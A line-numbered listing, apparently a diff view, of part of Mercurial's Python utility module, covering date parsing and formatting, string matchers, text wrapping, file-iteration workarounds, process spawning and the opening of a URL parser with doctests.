1890 1892 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1891 1893 datetime.datetime.fromtimestamp(timestamp))
1892 1894 tz = delta.days * 86400 + delta.seconds
1893 1895 return timestamp, tz
1894 1896
1895 1897 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1896 1898 """represent a (unixtime, offset) tuple as a localized time.
1897 1899 unixtime is seconds since the epoch, and offset is the time zone's
1898 1900 number of seconds away from UTC.
1899 1901
1900 1902 >>> datestr((0, 0))
1901 1903 'Thu Jan 01 00:00:00 1970 +0000'
1902 1904 >>> datestr((42, 0))
1903 1905 'Thu Jan 01 00:00:42 1970 +0000'
1904 1906 >>> datestr((-42, 0))
1905 1907 'Wed Dec 31 23:59:18 1969 +0000'
1906 1908 >>> datestr((0x7fffffff, 0))
1907 1909 'Tue Jan 19 03:14:07 2038 +0000'
1908 1910 >>> datestr((-0x80000000, 0))
1909 1911 'Fri Dec 13 20:45:52 1901 +0000'
1910 1912 """
1911 1913 t, tz = date or makedate()
1912 1914 if "%1" in format or "%2" in format or "%z" in format:
1913 1915 sign = (tz > 0) and "-" or "+"
1914 1916 minutes = abs(tz) // 60
1915 1917 q, r = divmod(minutes, 60)
1916 1918 format = format.replace("%z", "%1%2")
1917 1919 format = format.replace("%1", "%c%02d" % (sign, q))
1918 1920 format = format.replace("%2", "%02d" % r)
1919 1921 d = t - tz
1920 1922 if d > 0x7fffffff:
1921 1923 d = 0x7fffffff
1922 1924 elif d < -0x80000000:
1923 1925 d = -0x80000000
1924 1926 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1925 1927 # because they use the gmtime() system call which is buggy on Windows
1926 1928 # for negative values.
1927 1929 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1928 1930 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1929 1931 return s
1930 1932
1931 1933 def shortdate(date=None):
1932 1934 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1933 1935 return datestr(date, format='%Y-%m-%d')
1934 1936
1935 1937 def parsetimezone(s):
1936 1938 """find a trailing timezone, if any, in string, and return a
1937 1939 (offset, remainder) pair"""
1938 1940
1939 1941 if s.endswith("GMT") or s.endswith("UTC"):
1940 1942 return 0, s[:-3].rstrip()
1941 1943
1942 1944 # Unix-style timezones [+-]hhmm
1943 1945 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1944 1946 sign = (s[-5] == "+") and 1 or -1
1945 1947 hours = int(s[-4:-2])
1946 1948 minutes = int(s[-2:])
1947 1949 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1948 1950
1949 1951 # ISO8601 trailing Z
1950 1952 if s.endswith("Z") and s[-2:-1].isdigit():
1951 1953 return 0, s[:-1]
1952 1954
1953 1955 # ISO8601-style [+-]hh:mm
1954 1956 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1955 1957 s[-5:-3].isdigit() and s[-2:].isdigit()):
1956 1958 sign = (s[-6] == "+") and 1 or -1
1957 1959 hours = int(s[-5:-3])
1958 1960 minutes = int(s[-2:])
1959 1961 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1960 1962
1961 1963 return None, s
1962 1964
1963 1965 def strdate(string, format, defaults=None):
1964 1966 """parse a localized time string and return a (unixtime, offset) tuple.
1965 1967 if the string cannot be parsed, ValueError is raised."""
1966 1968 if defaults is None:
1967 1969 defaults = {}
1968 1970
1969 1971 # NOTE: unixtime = localunixtime + offset
1970 1972 offset, date = parsetimezone(string)
1971 1973
1972 1974 # add missing elements from defaults
1973 1975 usenow = False # default to using biased defaults
1974 1976 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1975 1977 part = pycompat.bytestr(part)
1976 1978 found = [True for p in part if ("%"+p) in format]
1977 1979 if not found:
1978 1980 date += "@" + defaults[part][usenow]
1979 1981 format += "@%" + part[0]
1980 1982 else:
1981 1983 # We've found a specific time element, less specific time
1982 1984 # elements are relative to today
1983 1985 usenow = True
1984 1986
1985 1987 timetuple = time.strptime(encoding.strfromlocal(date),
1986 1988 encoding.strfromlocal(format))
1987 1989 localunixtime = int(calendar.timegm(timetuple))
1988 1990 if offset is None:
1989 1991 # local timezone
1990 1992 unixtime = int(time.mktime(timetuple))
1991 1993 offset = unixtime - localunixtime
1992 1994 else:
1993 1995 unixtime = localunixtime + offset
1994 1996 return unixtime, offset
1995 1997
1996 1998 def parsedate(date, formats=None, bias=None):
1997 1999 """parse a localized date/time and return a (unixtime, offset) tuple.
1998 2000
1999 2001 The date may be a "unixtime offset" string or in one of the specified
2000 2002 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2001 2003
2002 2004 >>> parsedate(' today ') == parsedate(\
2003 2005 datetime.date.today().strftime('%b %d'))
2004 2006 True
2005 2007 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
2006 2008 datetime.timedelta(days=1)\
2007 2009 ).strftime('%b %d'))
2008 2010 True
2009 2011 >>> now, tz = makedate()
2010 2012 >>> strnow, strtz = parsedate('now')
2011 2013 >>> (strnow - now) < 1
2012 2014 True
2013 2015 >>> tz == strtz
2014 2016 True
2015 2017 """
2016 2018 if bias is None:
2017 2019 bias = {}
2018 2020 if not date:
2019 2021 return 0, 0
2020 2022 if isinstance(date, tuple) and len(date) == 2:
2021 2023 return date
2022 2024 if not formats:
2023 2025 formats = defaultdateformats
2024 2026 date = date.strip()
2025 2027
2026 2028 if date == 'now' or date == _('now'):
2027 2029 return makedate()
2028 2030 if date == 'today' or date == _('today'):
2029 2031 date = datetime.date.today().strftime('%b %d')
2030 2032 elif date == 'yesterday' or date == _('yesterday'):
2031 2033 date = (datetime.date.today() -
2032 2034 datetime.timedelta(days=1)).strftime('%b %d')
2033 2035
2034 2036 try:
2035 2037 when, offset = map(int, date.split(' '))
2036 2038 except ValueError:
2037 2039 # fill out defaults
2038 2040 now = makedate()
2039 2041 defaults = {}
2040 2042 for part in ("d", "mb", "yY", "HI", "M", "S"):
2041 2043 # this piece is for rounding the specific end of unknowns
2042 2044 b = bias.get(part)
2043 2045 if b is None:
2044 2046 if part[0:1] in "HMS":
2045 2047 b = "00"
2046 2048 else:
2047 2049 b = "0"
2048 2050
2049 2051 # this piece is for matching the generic end to today's date
2050 2052 n = datestr(now, "%" + part[0:1])
2051 2053
2052 2054 defaults[part] = (b, n)
2053 2055
2054 2056 for format in formats:
2055 2057 try:
2056 2058 when, offset = strdate(date, format, defaults)
2057 2059 except (ValueError, OverflowError):
2058 2060 pass
2059 2061 else:
2060 2062 break
2061 2063 else:
2062 2064 raise error.ParseError(_('invalid date: %r') % date)
2063 2065 # validate explicit (probably user-specified) date and
2064 2066 # time zone offset. values must fit in signed 32 bits for
2065 2067 # current 32-bit linux runtimes. timezones go from UTC-12
2066 2068 # to UTC+14
2067 2069 if when < -0x80000000 or when > 0x7fffffff:
2068 2070 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2069 2071 if offset < -50400 or offset > 43200:
2070 2072 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2071 2073 return when, offset
2072 2074
2073 2075 def matchdate(date):
2074 2076 """Return a function that matches a given date match specifier
2075 2077
2076 2078 Formats include:
2077 2079
2078 2080 '{date}' match a given date to the accuracy provided
2079 2081
2080 2082 '<{date}' on or before a given date
2081 2083
2082 2084 '>{date}' on or after a given date
2083 2085
2084 2086 >>> p1 = parsedate("10:29:59")
2085 2087 >>> p2 = parsedate("10:30:00")
2086 2088 >>> p3 = parsedate("10:30:59")
2087 2089 >>> p4 = parsedate("10:31:00")
2088 2090 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2089 2091 >>> f = matchdate("10:30")
2090 2092 >>> f(p1[0])
2091 2093 False
2092 2094 >>> f(p2[0])
2093 2095 True
2094 2096 >>> f(p3[0])
2095 2097 True
2096 2098 >>> f(p4[0])
2097 2099 False
2098 2100 >>> f(p5[0])
2099 2101 False
2100 2102 """
2101 2103
2102 2104 def lower(date):
2103 2105 d = {'mb': "1", 'd': "1"}
2104 2106 return parsedate(date, extendeddateformats, d)[0]
2105 2107
2106 2108 def upper(date):
2107 2109 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2108 2110 for days in ("31", "30", "29"):
2109 2111 try:
2110 2112 d["d"] = days
2111 2113 return parsedate(date, extendeddateformats, d)[0]
2112 2114 except Abort:
2113 2115 pass
2114 2116 d["d"] = "28"
2115 2117 return parsedate(date, extendeddateformats, d)[0]
2116 2118
2117 2119 date = date.strip()
2118 2120
2119 2121 if not date:
2120 2122 raise Abort(_("dates cannot consist entirely of whitespace"))
2121 2123 elif date[0] == "<":
2122 2124 if not date[1:]:
2123 2125 raise Abort(_("invalid day spec, use '<DATE'"))
2124 2126 when = upper(date[1:])
2125 2127 return lambda x: x <= when
2126 2128 elif date[0] == ">":
2127 2129 if not date[1:]:
2128 2130 raise Abort(_("invalid day spec, use '>DATE'"))
2129 2131 when = lower(date[1:])
2130 2132 return lambda x: x >= when
2131 2133 elif date[0] == "-":
2132 2134 try:
2133 2135 days = int(date[1:])
2134 2136 except ValueError:
2135 2137 raise Abort(_("invalid day spec: %s") % date[1:])
2136 2138 if days < 0:
2137 2139 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2138 2140 % date[1:])
2139 2141 when = makedate()[0] - days * 3600 * 24
2140 2142 return lambda x: x >= when
2141 2143 elif " to " in date:
2142 2144 a, b = date.split(" to ")
2143 2145 start, stop = lower(a), upper(b)
2144 2146 return lambda x: x >= start and x <= stop
2145 2147 else:
2146 2148 start, stop = lower(date), upper(date)
2147 2149 return lambda x: x >= start and x <= stop
2148 2150
2149 2151 def stringmatcher(pattern, casesensitive=True):
2150 2152 """
2151 2153 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2152 2154 returns the matcher name, pattern, and matcher function.
2153 2155 missing or unknown prefixes are treated as literal matches.
2154 2156
2155 2157 helper for tests:
2156 2158 >>> def test(pattern, *tests):
2157 2159 ... kind, pattern, matcher = stringmatcher(pattern)
2158 2160 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2159 2161 >>> def itest(pattern, *tests):
2160 2162 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2161 2163 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2162 2164
2163 2165 exact matching (no prefix):
2164 2166 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2165 2167 ('literal', 'abcdefg', [False, False, True])
2166 2168
2167 2169 regex matching ('re:' prefix)
2168 2170 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2169 2171 ('re', 'a.+b', [False, False, True])
2170 2172
2171 2173 force exact matches ('literal:' prefix)
2172 2174 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2173 2175 ('literal', 're:foobar', [False, True])
2174 2176
2175 2177 unknown prefixes are ignored and treated as literals
2176 2178 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2177 2179 ('literal', 'foo:bar', [False, False, True])
2178 2180
2179 2181 case insensitive regex matches
2180 2182 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2181 2183 ('re', 'A.+b', [False, False, True])
2182 2184
2183 2185 case insensitive literal matches
2184 2186 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2185 2187 ('literal', 'ABCDEFG', [False, False, True])
2186 2188 """
2187 2189 if pattern.startswith('re:'):
2188 2190 pattern = pattern[3:]
2189 2191 try:
2190 2192 flags = 0
2191 2193 if not casesensitive:
2192 2194 flags = remod.I
2193 2195 regex = remod.compile(pattern, flags)
2194 2196 except remod.error as e:
2195 2197 raise error.ParseError(_('invalid regular expression: %s')
2196 2198 % e)
2197 2199 return 're', pattern, regex.search
2198 2200 elif pattern.startswith('literal:'):
2199 2201 pattern = pattern[8:]
2200 2202
2201 2203 match = pattern.__eq__
2202 2204
2203 2205 if not casesensitive:
2204 2206 ipat = encoding.lower(pattern)
2205 2207 match = lambda s: ipat == encoding.lower(s)
2206 2208 return 'literal', pattern, match
2207 2209
2208 2210 def shortuser(user):
2209 2211 """Return a short representation of a user name or email address."""
2210 2212 f = user.find('@')
2211 2213 if f >= 0:
2212 2214 user = user[:f]
2213 2215 f = user.find('<')
2214 2216 if f >= 0:
2215 2217 user = user[f + 1:]
2216 2218 f = user.find(' ')
2217 2219 if f >= 0:
2218 2220 user = user[:f]
2219 2221 f = user.find('.')
2220 2222 if f >= 0:
2221 2223 user = user[:f]
2222 2224 return user
2223 2225
2224 2226 def emailuser(user):
2225 2227 """Return the user portion of an email address."""
2226 2228 f = user.find('@')
2227 2229 if f >= 0:
2228 2230 user = user[:f]
2229 2231 f = user.find('<')
2230 2232 if f >= 0:
2231 2233 user = user[f + 1:]
2232 2234 return user
2233 2235
2234 2236 def email(author):
2235 2237 '''get email of author.'''
2236 2238 r = author.find('>')
2237 2239 if r == -1:
2238 2240 r = None
2239 2241 return author[author.find('<') + 1:r]
2240 2242
2241 2243 def ellipsis(text, maxlength=400):
2242 2244 """Trim string to at most maxlength (default: 400) columns in display."""
2243 2245 return encoding.trim(text, maxlength, ellipsis='...')
2244 2246
2245 2247 def unitcountfn(*unittable):
2246 2248 '''return a function that renders a readable count of some quantity'''
2247 2249
2248 2250 def go(count):
2249 2251 for multiplier, divisor, format in unittable:
2250 2252 if abs(count) >= divisor * multiplier:
2251 2253 return format % (count / float(divisor))
2252 2254 return unittable[-1][2] % count
2253 2255
2254 2256 return go
2255 2257
2256 2258 def processlinerange(fromline, toline):
2257 2259 """Check that linerange <fromline>:<toline> makes sense and return a
2258 2260 0-based range.
2259 2261
2260 2262 >>> processlinerange(10, 20)
2261 2263 (9, 20)
2262 2264 >>> processlinerange(2, 1)
2263 2265 Traceback (most recent call last):
2264 2266 ...
2265 2267 ParseError: line range must be positive
2266 2268 >>> processlinerange(0, 5)
2267 2269 Traceback (most recent call last):
2268 2270 ...
2269 2271 ParseError: fromline must be strictly positive
2270 2272 """
2271 2273 if toline - fromline < 0:
2272 2274 raise error.ParseError(_("line range must be positive"))
2273 2275 if fromline < 1:
2274 2276 raise error.ParseError(_("fromline must be strictly positive"))
2275 2277 return fromline - 1, toline
2276 2278
2277 2279 bytecount = unitcountfn(
2278 2280 (100, 1 << 30, _('%.0f GB')),
2279 2281 (10, 1 << 30, _('%.1f GB')),
2280 2282 (1, 1 << 30, _('%.2f GB')),
2281 2283 (100, 1 << 20, _('%.0f MB')),
2282 2284 (10, 1 << 20, _('%.1f MB')),
2283 2285 (1, 1 << 20, _('%.2f MB')),
2284 2286 (100, 1 << 10, _('%.0f KB')),
2285 2287 (10, 1 << 10, _('%.1f KB')),
2286 2288 (1, 1 << 10, _('%.2f KB')),
2287 2289 (1, 1, _('%.0f bytes')),
2288 2290 )
2289 2291
2290 2292 # Matches a single EOL which can either be a CRLF where repeated CR
2291 2293 # are removed or a LF. We do not care about old Macintosh files, so a
2292 2294 # stray CR is an error.
2293 2295 _eolre = remod.compile(br'\r*\n')
2294 2296
2295 2297 def tolf(s):
2296 2298 return _eolre.sub('\n', s)
2297 2299
2298 2300 def tocrlf(s):
2299 2301 return _eolre.sub('\r\n', s)
2300 2302
2301 2303 if pycompat.oslinesep == '\r\n':
2302 2304 tonativeeol = tocrlf
2303 2305 fromnativeeol = tolf
2304 2306 else:
2305 2307 tonativeeol = pycompat.identity
2306 2308 fromnativeeol = pycompat.identity
2307 2309
2308 2310 def escapestr(s):
2309 2311 # call underlying function of s.encode('string_escape') directly for
2310 2312 # Python 3 compatibility
2311 2313 return codecs.escape_encode(s)[0]
2312 2314
2313 2315 def unescapestr(s):
2314 2316 return codecs.escape_decode(s)[0]
2315 2317
2316 2318 def forcebytestr(obj):
2317 2319 """Portably format an arbitrary object (e.g. exception) into a byte
2318 2320 string."""
2319 2321 try:
2320 2322 return pycompat.bytestr(obj)
2321 2323 except UnicodeEncodeError:
2322 2324 # non-ascii string, may be lossy
2323 2325 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2324 2326
2325 2327 def uirepr(s):
2326 2328 # Avoid double backslash in Windows path repr()
2327 2329 return repr(s).replace('\\\\', '\\')
2328 2330
2329 2331 # delay import of textwrap
2330 2332 def MBTextWrapper(**kwargs):
2331 2333 class tw(textwrap.TextWrapper):
2332 2334 """
2333 2335 Extend TextWrapper for width-awareness.
2334 2336
2335 2337 Neither number of 'bytes' in any encoding nor 'characters' is
2336 2338 appropriate to calculate terminal columns for specified string.
2337 2339
2338 2340 Original TextWrapper implementation uses built-in 'len()' directly,
2339 2341 so overriding is needed to use width information of each characters.
2340 2342
2341 2343 In addition, characters classified into 'ambiguous' width are
2342 2344 treated as wide in East Asian area, but as narrow in other.
2343 2345
2344 2346 This requires use decision to determine width of such characters.
2345 2347 """
2346 2348 def _cutdown(self, ucstr, space_left):
2347 2349 l = 0
2348 2350 colwidth = encoding.ucolwidth
2349 2351 for i in xrange(len(ucstr)):
2350 2352 l += colwidth(ucstr[i])
2351 2353 if space_left < l:
2352 2354 return (ucstr[:i], ucstr[i:])
2353 2355 return ucstr, ''
2354 2356
2355 2357 # overriding of base class
2356 2358 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2357 2359 space_left = max(width - cur_len, 1)
2358 2360
2359 2361 if self.break_long_words:
2360 2362 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2361 2363 cur_line.append(cut)
2362 2364 reversed_chunks[-1] = res
2363 2365 elif not cur_line:
2364 2366 cur_line.append(reversed_chunks.pop())
2365 2367
2366 2368 # this overriding code is imported from TextWrapper of Python 2.6
2367 2369 # to calculate columns of string by 'encoding.ucolwidth()'
2368 2370 def _wrap_chunks(self, chunks):
2369 2371 colwidth = encoding.ucolwidth
2370 2372
2371 2373 lines = []
2372 2374 if self.width <= 0:
2373 2375 raise ValueError("invalid width %r (must be > 0)" % self.width)
2374 2376
2375 2377 # Arrange in reverse order so items can be efficiently popped
2376 2378 # from a stack of chucks.
2377 2379 chunks.reverse()
2378 2380
2379 2381 while chunks:
2380 2382
2381 2383 # Start the list of chunks that will make up the current line.
2382 2384 # cur_len is just the length of all the chunks in cur_line.
2383 2385 cur_line = []
2384 2386 cur_len = 0
2385 2387
2386 2388 # Figure out which static string will prefix this line.
2387 2389 if lines:
2388 2390 indent = self.subsequent_indent
2389 2391 else:
2390 2392 indent = self.initial_indent
2391 2393
2392 2394 # Maximum width for this line.
2393 2395 width = self.width - len(indent)
2394 2396
2395 2397 # First chunk on line is whitespace -- drop it, unless this
2396 2398 # is the very beginning of the text (i.e. no lines started yet).
2397 2399 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2398 2400 del chunks[-1]
2399 2401
2400 2402 while chunks:
2401 2403 l = colwidth(chunks[-1])
2402 2404
2403 2405 # Can at least squeeze this chunk onto the current line.
2404 2406 if cur_len + l <= width:
2405 2407 cur_line.append(chunks.pop())
2406 2408 cur_len += l
2407 2409
2408 2410 # Nope, this line is full.
2409 2411 else:
2410 2412 break
2411 2413
2412 2414 # The current line is full, and the next chunk is too big to
2413 2415 # fit on *any* line (not just this one).
2414 2416 if chunks and colwidth(chunks[-1]) > width:
2415 2417 self._handle_long_word(chunks, cur_line, cur_len, width)
2416 2418
2417 2419 # If the last chunk on this line is all whitespace, drop it.
2418 2420 if (self.drop_whitespace and
2419 2421 cur_line and cur_line[-1].strip() == r''):
2420 2422 del cur_line[-1]
2421 2423
2422 2424 # Convert current line back to a string and store it in list
2423 2425 # of all lines (return value).
2424 2426 if cur_line:
2425 2427 lines.append(indent + r''.join(cur_line))
2426 2428
2427 2429 return lines
2428 2430
2429 2431 global MBTextWrapper
2430 2432 MBTextWrapper = tw
2431 2433 return tw(**kwargs)
2432 2434
2433 2435 def wrap(line, width, initindent='', hangindent=''):
2434 2436 maxindent = max(len(hangindent), len(initindent))
2435 2437 if width <= maxindent:
2436 2438 # adjust for weird terminal size
2437 2439 width = max(78, maxindent + 1)
2438 2440 line = line.decode(pycompat.sysstr(encoding.encoding),
2439 2441 pycompat.sysstr(encoding.encodingmode))
2440 2442 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2441 2443 pycompat.sysstr(encoding.encodingmode))
2442 2444 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2443 2445 pycompat.sysstr(encoding.encodingmode))
2444 2446 wrapper = MBTextWrapper(width=width,
2445 2447 initial_indent=initindent,
2446 2448 subsequent_indent=hangindent)
2447 2449 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2448 2450
2449 2451 if (pyplatform.python_implementation() == 'CPython' and
2450 2452 sys.version_info < (3, 0)):
2451 2453 # There is an issue in CPython that some IO methods do not handle EINTR
2452 2454 # correctly. The following table shows what CPython version (and functions)
2453 2455 # are affected (buggy: has the EINTR bug, okay: otherwise):
2454 2456 #
2455 2457 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2456 2458 # --------------------------------------------------
2457 2459 # fp.__iter__ | buggy | buggy | okay
2458 2460 # fp.read* | buggy | okay [1] | okay
2459 2461 #
2460 2462 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2461 2463 #
2462 2464 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2463 2465 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2464 2466 #
2465 2467 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2466 2468 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2467 2469 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2468 2470 # fp.__iter__ but not other fp.read* methods.
2469 2471 #
2470 2472 # On modern systems like Linux, the "read" syscall cannot be interrupted
2471 2473 # when reading "fast" files like on-disk files. So the EINTR issue only
2472 2474 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2473 2475 # files approximately as "fast" files and use the fast (unsafe) code path,
2474 2476 # to minimize the performance impact.
2475 2477 if sys.version_info >= (2, 7, 4):
2476 2478 # fp.readline deals with EINTR correctly, use it as a workaround.
2477 2479 def _safeiterfile(fp):
2478 2480 return iter(fp.readline, '')
2479 2481 else:
2480 2482 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2481 2483 # note: this may block longer than necessary because of bufsize.
2482 2484 def _safeiterfile(fp, bufsize=4096):
2483 2485 fd = fp.fileno()
2484 2486 line = ''
2485 2487 while True:
2486 2488 try:
2487 2489 buf = os.read(fd, bufsize)
2488 2490 except OSError as ex:
2489 2491 # os.read only raises EINTR before any data is read
2490 2492 if ex.errno == errno.EINTR:
2491 2493 continue
2492 2494 else:
2493 2495 raise
2494 2496 line += buf
2495 2497 if '\n' in buf:
2496 2498 splitted = line.splitlines(True)
2497 2499 line = ''
2498 2500 for l in splitted:
2499 2501 if l[-1] == '\n':
2500 2502 yield l
2501 2503 else:
2502 2504 line = l
2503 2505 if not buf:
2504 2506 break
2505 2507 if line:
2506 2508 yield line
2507 2509
2508 2510 def iterfile(fp):
2509 2511 fastpath = True
2510 2512 if type(fp) is file:
2511 2513 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2512 2514 if fastpath:
2513 2515 return fp
2514 2516 else:
2515 2517 return _safeiterfile(fp)
2516 2518 else:
2517 2519 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2518 2520 def iterfile(fp):
2519 2521 return fp
2520 2522
2521 2523 def iterlines(iterator):
2522 2524 for chunk in iterator:
2523 2525 for line in chunk.splitlines():
2524 2526 yield line
2525 2527
2526 2528 def expandpath(path):
2527 2529 return os.path.expanduser(os.path.expandvars(path))
2528 2530
2529 2531 def hgcmd():
2530 2532 """Return the command used to execute current hg
2531 2533
2532 2534 This is different from hgexecutable() because on Windows we want
2533 2535 to avoid things opening new shell windows like batch files, so we
2534 2536 get either the python call or current executable.
2535 2537 """
2536 2538 if mainfrozen():
2537 2539 if getattr(sys, 'frozen', None) == 'macosx_app':
2538 2540 # Env variable set by py2app
2539 2541 return [encoding.environ['EXECUTABLEPATH']]
2540 2542 else:
2541 2543 return [pycompat.sysexecutable]
2542 2544 return gethgcmd()
2543 2545
2544 2546 def rundetached(args, condfn):
2545 2547 """Execute the argument list in a detached process.
2546 2548
2547 2549 condfn is a callable which is called repeatedly and should return
2548 2550 True once the child process is known to have started successfully.
2549 2551 At this point, the child process PID is returned. If the child
2550 2552 process fails to start or finishes before condfn() evaluates to
2551 2553 True, return -1.
2552 2554 """
2553 2555 # Windows case is easier because the child process is either
2554 2556 # successfully starting and validating the condition or exiting
2555 2557 # on failure. We just poll on its PID. On Unix, if the child
2556 2558 # process fails to start, it will be left in a zombie state until
2557 2559 # the parent wait on it, which we cannot do since we expect a long
2558 2560 # running process on success. Instead we listen for SIGCHLD telling
2559 2561 # us our child process terminated.
2560 2562 terminated = set()
2561 2563 def handler(signum, frame):
2562 2564 terminated.add(os.wait())
2563 2565 prevhandler = None
2564 2566 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2565 2567 if SIGCHLD is not None:
2566 2568 prevhandler = signal.signal(SIGCHLD, handler)
2567 2569 try:
2568 2570 pid = spawndetached(args)
2569 2571 while not condfn():
2570 2572 if ((pid in terminated or not testpid(pid))
2571 2573 and not condfn()):
2572 2574 return -1
2573 2575 time.sleep(0.1)
2574 2576 return pid
2575 2577 finally:
2576 2578 if prevhandler is not None:
2577 2579 signal.signal(signal.SIGCHLD, prevhandler)
2578 2580
2579 2581 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2580 2582 """Return the result of interpolating items in the mapping into string s.
2581 2583
2582 2584 prefix is a single character string, or a two character string with
2583 2585 a backslash as the first character if the prefix needs to be escaped in
2584 2586 a regular expression.
2585 2587
2586 2588 fn is an optional function that will be applied to the replacement text
2587 2589 just before replacement.
2588 2590
2589 2591 escape_prefix is an optional flag that allows using doubled prefix for
2590 2592 its escaping.
2591 2593 """
2592 2594 fn = fn or (lambda s: s)
2593 2595 patterns = '|'.join(mapping.keys())
2594 2596 if escape_prefix:
2595 2597 patterns += '|' + prefix
2596 2598 if len(prefix) > 1:
2597 2599 prefix_char = prefix[1:]
2598 2600 else:
2599 2601 prefix_char = prefix
2600 2602 mapping[prefix_char] = prefix_char
2601 2603 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2602 2604 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2603 2605
2604 2606 def getport(port):
2605 2607 """Return the port for a given network service.
2606 2608
2607 2609 If port is an integer, it's returned as is. If it's a string, it's
2608 2610 looked up using socket.getservbyname(). If there's no matching
2609 2611 service, error.Abort is raised.
2610 2612 """
2611 2613 try:
2612 2614 return int(port)
2613 2615 except ValueError:
2614 2616 pass
2615 2617
2616 2618 try:
2617 2619 return socket.getservbyname(port)
2618 2620 except socket.error:
2619 2621 raise Abort(_("no port number associated with service '%s'") % port)
2620 2622
2621 2623 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2622 2624 '0': False, 'no': False, 'false': False, 'off': False,
2623 2625 'never': False}
2624 2626
2625 2627 def parsebool(s):
2626 2628 """Parse s into a boolean.
2627 2629
2628 2630 If s is not a valid boolean, returns None.
2629 2631 """
2630 2632 return _booleans.get(s.lower(), None)
2631 2633
2632 2634 _hextochr = dict((a + b, chr(int(a + b, 16)))
2633 2635 for a in string.hexdigits for b in string.hexdigits)
2634 2636
2635 2637 class url(object):
2636 2638 r"""Reliable URL parser.
2637 2639
2638 2640 This parses URLs and provides attributes for the following
2639 2641 components:
2640 2642
2641 2643 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2642 2644
2643 2645 Missing components are set to None. The only exception is
2644 2646 fragment, which is set to '' if present but empty.
2645 2647
2646 2648 If parsefragment is False, fragment is included in query. If
2647 2649 parsequery is False, query is included in path. If both are
2648 2650 False, both fragment and query are included in path.
2649 2651
2650 2652 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2651 2653
2652 2654 Note that for backward compatibility reasons, bundle URLs do not
2653 2655 take host names. That means 'bundle://../' has a path of '../'.
2654 2656
2655 2657 Examples:
2656 2658
2657 2659 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2658 2660 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2659 2661 >>> url('ssh://[::1]:2200//home/joe/repo')
2660 2662 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2661 2663 >>> url('file:///home/joe/repo')
2662 2664 <url scheme: 'file', path: '/home/joe/repo'>
2663 2665 >>> url('file:///c:/temp/foo/')
2664 2666 <url scheme: 'file', path: 'c:/temp/foo/'>
2665 2667 >>> url('bundle:foo')
2666 2668 <url scheme: 'bundle', path: 'foo'>
2667 2669 >>> url('bundle://../foo')
2668 2670 <url scheme: 'bundle', path: '../foo'>
2669 2671 >>> url(r'c:\foo\bar')
2670 2672 <url path: 'c:\\foo\\bar'>
2671 2673 >>> url(r'\\blah\blah\blah')
2672 2674 <url path: '\\\\blah\\blah\\blah'>
2673 2675 >>> url(r'\\blah\blah\blah#baz')
2674 2676 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2675 2677 >>> url(r'file:///C:\users\me')
2676 2678 <url scheme: 'file', path: 'C:\\users\\me'>
2677 2679
2678 2680 Authentication credentials:
2679 2681
2680 2682 >>> url('ssh://joe:xyz@x/repo')
2681 2683 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2682 2684 >>> url('ssh://joe@x/repo')
2683 2685 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2684 2686
2685 2687 Query strings and fragments:
2686 2688
2687 2689 >>> url('http://host/a?b#c')
2688 2690 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
